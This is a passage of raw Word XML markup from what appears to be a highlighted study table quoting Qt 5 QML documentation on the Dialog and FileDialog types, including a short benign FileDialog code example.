              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This is much like creating a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1798" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Window</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, except that</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> on platforms which do not support showing multiple windows, the window borders will be simulated and it will be shown in same scene.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00763692" w:rsidRPr="00763692" w:rsidRDefault="00763692" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>do not attempt to bind</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the width or height of the dialog to the width or height of its content, because Dialog already tries to size itself to the content. If your goal is to change or eliminate the margins, </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>you must override </w:t>
            </w:r>
            <w:hyperlink r:id="rId1799" w:anchor="contentItem-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>contentItem</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. If your goal is simply to show a window (whether modal or not), and your platform supports it, it is simpler to use </w:t>
            </w:r>
            <w:hyperlink r:id="rId1800" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Window</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> instead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00763692" w:rsidRPr="00F413C2" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00F413C2" w:rsidRDefault="00F413C2" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FileDialog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1801" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="005A37A4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRDefault="00F413C2" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dialog component for choosing files from a local filesystem.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F413C2" w:rsidRPr="00F413C2" w:rsidRDefault="00490E7E" w:rsidP="00F413C2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1802" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> provides a </w:t>
            </w:r>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>basic file chooser</w:t>
            </w:r>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: it allows the user to select existing files and/or directories, or create new filenames. The dialog is initially invisible. You need to set the properties as desired first, then set </w:t>
            </w:r>
            <w:hyperlink r:id="rId1803" w:anchor="visible-prop" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>visible</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> to true or call </w:t>
            </w:r>
            <w:hyperlink r:id="rId1804" w:anchor="open-method" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>open()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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Here is a minimal example to open a file dialog and exit after the user chooses a file:</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import QtQuick 2.2</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import QtQuick.Dialogs 1.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F413C2" w:rsidRPr="00F413C2" w:rsidRDefault="00F413C2" w:rsidP="00F413C2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F413C2" w:rsidRPr="00F413C2" w:rsidRDefault="00490E7E" w:rsidP="00F413C2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1805" w:history="1">
              <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F413C2" w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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    id: fileDialog</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    title: "Please choose a file"</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    folder: shortcuts.home</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    onAccepted: {</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        console.log("You chose: " + fileDialog.fileUrls)</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        Qt.quit()</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    }</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    onRejected: {</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        console.log("Canceled")</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        Qt.quit()</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    }</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    Component.onCompleted: visible = true</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A </w:t>
            </w:r>
            <w:hyperlink r:id="rId1806" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> window is </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>automatically transient</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> for its parent window. So whether you declare the dialog inside an </w:t>
            </w:r>
            <w:hyperlink r:id="rId1807" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Item</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> or inside a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1808" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Window</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, the dialog will appear centered over the window containing the item, or over the Window that you declared.</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The </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>implementation of </w:t>
            </w:r>
            <w:hyperlink r:id="rId1809" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>FileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> will be a platform file dialog if possible</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. If that isn't possible, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>then it will try</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to instantiate a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1810" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QFileDialog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. If that also isn't possible, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>then it will fall back</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to a QML implementation, DefaultFileDialog.qml. In that case you can customize the appearance by </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>editing this file</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. DefaultFileDialog.qml contains a Rectangle to hold the dialog's contents, because certain embedded systems do not support multiple top-level windows. When the dialog becomes visible, it will </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>automatically be wrapped</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a Window if possible, or simply reparented on top of the main window if there can only be one window.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F413C2" w:rsidRPr="00F413C2" w:rsidRDefault="00F413C2" w:rsidP="00F413C2">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The QML implementation has a </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sidebar containing </w:t>
            </w:r>
            <w:hyperlink r:id="rId1811" w:anchor="shortcuts-prop" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>shortcuts</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> to common platform-specific locations</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>user-modifiable favorites</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. It uses application-specific </w:t>
            </w:r>
            <w:hyperlink r:id="rId1812" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>settings</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to store the user's favorites, as well as other user-modifiable state, such as whether or not the sidebar is shown, the positions of the splitters, and the dialog size. The </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>settings are stored in</w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a section called</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QQControlsFileDialogof the application-specific </w:t>
            </w:r>
            <w:hyperlink r:id="rId1813" w:history="1">
              <w:r w:rsidRPr="00F413C2">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QSettings</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. For example when testing an application with the qml tool, the</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F413C2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QQControlsFileDialog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
